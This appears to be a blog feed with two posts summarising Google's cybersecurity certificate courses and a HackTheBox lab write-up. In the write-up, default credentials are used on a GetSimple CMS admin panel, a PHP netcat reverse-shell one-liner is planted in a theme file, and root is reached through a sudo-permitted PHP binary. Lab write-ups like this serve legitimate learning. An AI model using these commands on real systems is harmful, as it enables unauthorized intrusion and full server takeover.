DEV Community: CyberZeal

What Googlers can teach you about Security part 2

CyberZeal — Tue, 25 Jun 2024 17:40:10 +0000

[TL;DR, I'm a Web Dev and I don't care about Cybersec] - go and read Open Worldwide Application Security Project (OWASP) Top 10 Web Application Security Risks you must know this stuff, if your web app runs on anything else than http://127.0.0.1

Previously I wrote about Google's Cybersecurity Professional program and why I enrolled into it. If you haven't already, go and read it here.

If you've already read it - we continue with the second course in the series - "Play It Safe: Manage Security Risks"

Again, I only focus on some of the key points, course has a lots of content and hands on exercises - if you are interested how Cybersecurity industry works, explained through real life examples from Google, you should definitely take the course.

Even if you are developer and have no interest in working in Cybersec, this will give you a better picture of how your organization operates.

And who knows, maybe along the way you fall in love with Cyber. ❤️

Module 1

First module goes in depth with CISSP’s eight security domains that were mentioned in the previous course/post. I will list them again because they show how vast is the Security industry. Also, you can see the Roles and some of the responsibilities associated with them.

Security and Risk Management:
- Roles: Chief Information Security Officer (CISO), Risk Manager, Compliance Officer.
- Responsibilities:
  - Develop security policies and procedures.
  - Assess and manage risks.
  - Ensure compliance with regulations and standards.
  - Align security practices with organizational goals.
Asset Security:
- Roles: Data Owners, System Administrators, Privacy Officers.
- Responsibilities:
  - Manage information assets (data, hardware, software).
  - Define access controls and ownership.
  - Protect sensitive data and enforce privacy rules.
Security architecture and engineering
- Roles: Security Architects, Systems Engineers.
- Responsibilities:
  - Design secure systems and networks.
  - Implement encryption, firewalls, and access controls.
  - Evaluate security technologies.
Communication and Network Security:
- Roles: Network Administrators, Security Analysts.
- Responsibilities:
  - Secure network infrastructure (routers, switches).
  - Implement VPNs, firewalls, and intrusion detection systems.
  - Ensure secure data transmission.
Identity and Access Management (IAM):
- Roles: IAM Managers, Access Control Administrators, System Administrators.
- Responsibilities:
  - Manage user identities and access rights.
  - Implement authentication and authorization mechanisms.
  - Monitor user activity.
Security Assessment and Testing:
- Roles: Penetration Testers, Vulnerability Assessors.
- Responsibilities:
  - Conduct security assessments (penetration testing, vulnerability scanning).
  - Identify weaknesses and recommend improvements.
  - Validate security controls.
Security Operations:
- Roles: Security Analysts, Incident Responders.
- Responsibilities:
  - Monitor security events and incidents.
  - Investigate breaches and coordinate responses.
  - Manage security incidents and recovery.
Software Development Security:
- Roles: Software Developers, Security Champions.
- Responsibilities:
  - Write secure code.
  - Perform code reviews for vulnerabilities.
  - Ensure software remains free of flaws.

Risk management

You must keep your assets secure! Assets can be digital or physical - personal information of customers, trade secrets, servers, confidential documents…

The NIST Risk Management Framework (RMF) is a comprehensive, flexible, and repeatable 7-step process that organizations can use to manage information security and privacy risk.

The 7 steps are:

Prepare: Talk to key stakeholders, prepare a broad risk management strategy
Categorize: Analyze the system, categorize the data, and do an impact analysis.
Select: Choose NIST SP 800-53 controls based on risk assessment.
Implement: Deploy controls and document their deployment.
Assess: Verify control effectiveness.
Authorize: Senior management authorizes the whole thing.
Monitor: Continuously monitor control implementation and risks.

You can see list of cybersecurity risks here.

Also there is a famous OWASP top 10 security risks for web applications. If you are a web dev you should really really get acquainted with this list.

You can see how the top list changes through time.

Image credit Google Cybersecurity Professional Program

Module 2

We already mentioned CIA in previous post, but it’s so crucial that we will expand a bit here. The way I see it is whatever assessment you do in security, be it Application Threat Modeling or Infrastructure Security Review or Risk Assessment you are thinking about these three things:

Confidentiality - Who can access what? We need to ensure only authorized users can access specific parts of the system.

Integrity - No one should tamper with your system. And if someone does you should know about it.

Availability - Systems should be available to the authorized users.

Rest of the module goes in depth with OWASP and NIST CyberSecurity Framework. Also first hand on exercise is here - you conduct a security audit of a fictional small company that had a recent increase in business. It really well made and you see how everything you learned so far is applied in the real world.

Module 3

This module goes in depth on Security Information and Event Management (SIEM) tools. SIEM tools aggregate all event streams in the organization, like network logs, app logs and so on. And if something weird starts happening they sound the alert.

A picture is worth a thousand words, and video is.. thousand words per frame, I guess... So you can go and check IBM’s 4min video about this, if you are interested. Or do a web search on Splunk to see how the most popular SIEM solution looks like.

There is also a thing called Security orchestration, automation, and response (SOAR) which is considered to be a future of SIEM - or at least it can be used to automate some repetitive tasks generated by SIEMs. More about it here.

Module 4

So, your SIEM detected an intrusion, what do you do? Don’t panic, if you work in serious organization you have a Playbook. If you don’t have a Playbook? Well, than you can panic. 😅

Last module is about Playbooks. But what is a Playbook you ask?

A Playbook is a manual which tells you what exactly you need to do and with what tools in response to a security incident.

Playbooks ensure a consistent list of actions is followed, regardless of who is handling the case.

Different types of playbooks exist, including those for incident response, security alerts, team-specific, and product-specific purposes.

Here, we'll focus on a commonly used cybersecurity playbook called an incident response playbook. Incident response involves quickly identifying an attack, containing damage, and correcting the effects of a breach. An incident response playbook includes six phases to help manage security incidents from start to finish. Now while I think theory has it’s place, these type of things are best explained using real world examples. Here is how each step would look like for some concrete scenario:

📝 Preparation: An organization creates an incident response plan that outlines specific procedures for different types of incidents (e.g., data breaches, DDoS attacks, malware outbreaks). They identify key personnel responsible for incident response, establish communication channels, and conduct regular tabletop exercises to ensure everyone knows their roles.
🔍 Detection and Analysis: A security operations center (SOC) detects unusual network traffic patterns indicating a potential intrusion. Analysts investigate the incident, analyze logs, and use threat intelligence feeds to determine if the activity is malicious. They identify the affected systems and assess the impact.
🔒 Containment: Upon confirming a data breach, the incident response team isolates compromised servers from the network to prevent further spread. They disable compromised user accounts and block malicious IP addresses. The goal is to limit the attacker’s access and prevent additional damage.
👊 Eradication and Recovery: After identifying a ransomware attack, the organization removes the malware from affected systems. They restore data from backups and patch vulnerabilities that allowed the initial infection. The recovery process involves verifying system integrity and ensuring all services are operational.
☕ Post-Incident Activity: The incident response team conducts a postmortem analysis of a successful phishing attack. They document the attack vector, identify gaps in security controls, and recommend improvements. Leadership reviews the findings, and the organization updates its security policies and provides additional user training.
☎️ Coordination: This involves reporting incidents and sharing information throughout the response process based on established standards. Coordination ensures compliance requirements are met and allows for a coordinated response and resolution.

Again, there were a lots of other things, but you can get the idea. Feel free to ping me in the comments.

Stay safe!

What Googlers can teach you about Security

CyberZeal — Wed, 19 Jun 2024 15:13:13 +0000

TL;DR: just go watch Hacking Google. Google made few superbly produced episodes about times they got hacked.

Curious about what Googlers can teach you about Cyber Security? Then read on!

Some time ago I stepped into a Security role in my company, after almost 10 years of working as a developer. How and why that happened will be explained in another blog post, for now only thing that you need to know is that I’m something between Security Manager and Security Engineer for this huge product that has 100+ people spanning over multiple teams.

Now, I had some Security bootcamp, and then internal Security training lasting almost one and a half year. For some reason I was thinking that, plus picking things up as I go, would be enough, but boy was I wrong. Every few weeks we were spending a week covering a completely different topic, and this program was tailored to my company specific needs (which are very broad given that this is a 100k+ employees software company)

As a geek and fan of structured learning I started exploring what are my options. I found out that some college type education wont get you far in cybersecurity, which makes sense given that this industry is sooo fast. I mean, software engineering is fast, but if you have time and money you should go to college - learning your CS stuff will do wonders for you. But Cyber is crazily fast and as I see it (and I’m not the only one) is that Cyber security college has no real value, IF you have former tech education.

So, if you want structured learning in CyberSec, certificates are the way.

There are famous and advanced ones as OffSec and SANS but I wanted something that gives me an overview of the field and isn’t too pricey.

I concluded that Google’s Cybersecurity Professional Certificate Program was the best deal, as you can get it on Coursera, and it covers topics that CompTIA Security+ covers. You also get an voucher for 30% discount for Security+, and all that for Coursera monthly sub price.

You can also audit course, so you can later get back for the paid exercise and that way you can go through all the eight courses in a month.
Not sure is this a sleazeball move, especially since you can apply for financial aid on Coursera. As for me, in the end I paid for the annual sub, as I want to take some other courses too.

Ok, so Google Cybersecurity Professional Certificate Program consists of 8 courses, and it’s intention is to make you ready for entry level Security position, and give you an overview of Cyber Sec industry.

Let me tell you what is the first course (Foundations of Cybersecurity) about, and in the later blog posts I will cover the remaining 7.

Also, one disclaimer: I will give only the most interesting points to me.

Module 1

This module is essentially getting you hyped for Cyber Sec. Production of the whole program is great btw, wouldn’t expect less from Google. You get to hear from Google’s sec experts what are they doing at Google, what would be your responsibilities as a entry level sec analyst, and you get introduced to terminology. Also Google’s employees talk about their journey to Google, which is also very interesting.

Module 2

This module is about historical background, types of attacks that can happen and understanding attackers. Here are the types of attackers:

Advanced Persistent Threats (APTs): Usually state funded. Highly skilled and patient, APTs meticulously research targets (think big corporations or government agencies) and can remain undetected for long periods, aiming to steal valuable data or disrupt critical infrastructure.
Insider Threats: Insider threats are authorized users who misuse their access to steal data, sabotage systems, or commit espionage.
Hacktivists: These are the digital activists who use hacking to promote their cause. Their targets may be governments or corporations, and their goals range from raising awareness to social change campaigns.
Ethical or White Hat Hackers (Authorized Hackers): Ethical hackers use their skills legally to identify vulnerabilities in systems and help organizations improve their security posture.
Researchers or Grey Hat (Semi-Authorized Hackers): These guys discover weaknesses but don't exploit them. They responsibly report their findings to help improve overall security.
Unethical or Black Hat Hackers (Unauthorized Hackers): Bad guys. Motivated by financial gain or simply causing trouble, they exploit vulnerabilities to steal data or disrupt systems.

Also this module introduces the CISSP 8 Security Domains:

Security and risk management - focuses on defining security goals and objectives, risk mitigation, compliance, business continuity, and the law.
Asset security - focuses on securing digital and physical assets. It's also related to the storage, maintenance, retention, and destruction of data.
Security architecture and engineering - focuses on optimizing data security by ensuring effective tools, systems, and processes are in place.
Communication and network security - focuses on managing and securing physical networks and wireless communications.
Identity and access management- focuses on keeping data secure, by ensuring users follow established policies to control and manage physical assets, like office spaces, and logical assets, such as networks and applications.
Security assessment and testing - focuses on conducting security control testing, collecting and analyzing data, and conducting security audits to monitor for risks, threats, and vulnerabilities.
Security operations - focuses on conducting investigations and implementing preventative measures.
Software development security - focuses on using secure coding practices, which are a set of recommended guidelines that are used to create secure applications and services.

Module 3

This one is about frameworks. Funny story, I often heard Security guys mentioning CIA, and I was like “I’m pretty sure they are not talking about that CIA”. Well here I learned that CIA stands for Confidentiality, Integrity, and Availability which is foundational model for Cyber Security.

There are various frameworks but you may have heard about NIST Cybersecurity Framework.

Module 4

This module is about tools that cybersecurity people use:

Security information and event management (SIEM) - application that collects and analyzes log data to monitor critical activities in an organization.

Network protocol analyzers (packet sniffers) - network protocol analyzer, also known as a packet sniffer, is a tool designed to capture and analyze data traffic in a network.

Playbooks - playbook is a manual that provides details about any operational action, such as how to respond to a security incident.

And others which weren’t anything new to me were mentioned: Linux, SQL, Python.

There were a lots of other stuff but these were the things most interesting to me.
Stay tuned for next Course in the Program: Play It Safe: Manage Security Risks

Also, if you have any questions about the program, feel free to ping me in the comments.

Hacking a Server in Three Acts

CyberZeal — Thu, 30 May 2024 13:24:49 +0000

So, I got on this path of Cybersecurity after 10 years of working in industry as a Full Stack Java Developer. How and why that happened will be covered in another blog post. For our story today, only thing that you need to know is that at some point in my journey of learning about Security, I stumbled upon HackTheBox platform.

HTB Platform is about teaching you to hack into servers (boxes). And, man, not just that their content is superb, but the design and UX is so amazing... Long story short, I got hooked up, and started with the first course Cracking Into HTB.

They show you various techniques and stuff, and in the end you get an IP of a box that you need to hack into applying all that you learned. You also get your VM running Linux ParrotSec - a distro preloaded with tools for hacking/pentesting. It was super thrilling, and here is how it went:

Act I: Reconnaissance

First we need to see what's going on with the server, what ports are open and what OS and other software is running there. I wrote down IPs of target and my VM because they will be used often. I ran nmap <TARGET_IP> which performed a quick scan of most common ports. It returned 80 and 443, default ports for http and https.

Now I ran full port scan with version scan and scripts which try to obtain more detailed info. You get all this just by running nmap -sV -sC -p- <TARGET_IP>.

While nmap is running (full scan takes some time) I open target IP in browser. I see that Get Simple CMS is running there. Immediately I google GetSimple CMS vulnerabilities. Of course there is one high issue - Remote Code Execution.

I continue with Gobuster which will show me what folders there are on the server: gobuster dir -u <TARGET_IP> -w ./wordlists/common.txt

Well Gobuster showed me that there are some folders, most interesting of them being /admin folder (should have checked this even before I ran gobuster). So, I go to <TARGET_IP>/admin and I get login screen. Now you don't need to be a hacker to enter admin/admin when you see a login screen somewhere.

And interestingly enough, one of the instructors in Cybersecurity training in my company told me that one of the boxes on the (in)famous OSCP certification exam had this vulnerability. So, believe it or not, I got into the admin panel by using admin/admin credentials. Now we still don't have access to the server, but we are awfully close.

Act II: The Walls Have Been Breached

Now, I get back to the vulnerability that I googled. I see it's for version 3.3.16 and I check to see which one we have - it's 3.3.15 so hopefully we are good. I guess I could run the Metasploit here and get into the box using this vulnerability, but that feels like cheating.

At the first look the vulnerability is not straightforward so I get back to see what we have on the admin panel. There is a edit theme page which lets you include PHP files. I check where are those files loaded from. I go through /backup and /data folders that Gobuster found, and see some things that would help me to get the username and pass of admin, which I already guessed. There is an API key which may come in useful. (Later I found out that this would be used for authentication through Metasploit if I didn't get the access to the admin portal).

By this time full nmap scan has finished, I see that server uses OpenSSH 8.2p1 which has some vulnerabilities. But GetSimpleCMS is the elephant in the room here.

I go around the admin panel, there is an upload file button, but it’s not working. I google the issue and it’s not working because flash is not enabled. I get back to the edit theme and start to fiddle with it. I realize immediately that I’m retarded and that I can just write code here directly. Now it’s easy-peasy. At the end of the file, I just write:

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <MY_IP> 9443 >/tmp/f");?>

and, voila, I have a reverse shell. Of course, I need to run netcat to listen to this connection that will be opened: nc -lvnp 9443, and curl or just open the page that has the reverse shell code in it.

We are in! But for our victory to be complete, we need root access. Next step: Privilege escalation.

Act III: All Your Base Are Belong To Us

Let's first upgrade the shell a bit because in current state it doesn't have all the nice features we are used to. There are multiple ways to do this but I did it this way:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Now, I have full blown shell and I'm browsing around the file system to see is there anything interesting that can be used for privilege escalation. I also find the first flag.

I'm thinking of running the LinPEAS, but let's first see what sudo privileges I have - sudo -l -U <username>. Bingo! I see:
(ALL : ALL) NOPASSWD: /usr/bin/php which means I can execute PHP binary as root without password. And you know what that means..

I go and have a quick chat with chatGPT. Essentially you have numerous options here, but I go with interactive shell, because why not take everything life is giving to you.

sudo /usr/bin/php -a

php > chdir('/root');

chdir('/root');

php > print_r(scandir('.'));

print_r(scandir('.'));

Array
(
[0] => .
[1] => ..
[2] => .bash_history
[3] => .bashrc
[4] => .local
[5] => .php_history
[6] => .profile
[7] => .viminfo
[8] => root.txt
[9] => snap
)

php > echo file_get_contents('root.txt');

Essentially, now I have root shell and from here sky is the limit.

Whole process was, as I said, super thrilling. It is a interesting mixture of thrill when you do something bad and of fulfillment when you do something good. But more on that some other time.